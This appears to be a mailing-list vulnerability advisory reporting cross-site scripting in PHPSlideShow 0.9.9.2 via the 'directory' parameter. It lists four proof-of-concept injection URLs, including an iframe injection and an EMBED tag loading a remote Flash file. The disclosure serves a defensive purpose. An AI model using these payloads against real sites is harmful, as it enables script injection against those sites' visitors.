<<< Date Index >>>     <<< Thread Index >>>

PHPSlideShow XSS Update



Vendor Site: http://www.zinkwazi.com/wp/scripts/
Version affected: 0.9.9.2
URL:http://www.example.com/scripts/demo/phpslideshow.php?directory=photos

BID ref: 26576 By Jose Luis Góngora Fernández

PHPSlideShow is also susceptible the following inputs:

1.http://www.yoursite.com/scripts/demo/phpslideshow.php?directory=";><iframe>

2.http://www.yoursite.com/scripts/demo/phpslideshow.php?directory=<html><font 
color="Red"><b>Pwned</b></font></html>

3.http://www.yoursite.com/scripts/demo/phpslideshow.php?directory=<EMBED 
SRC="http://site.com/xss.swf";

4.http://www.yoursite.com/scripts/demo/phpslideshow.php?directory=FORM%20ACTION=%22search.php%22%20METHOD=%22GET%22%3E

Discovered by: Joshua Morin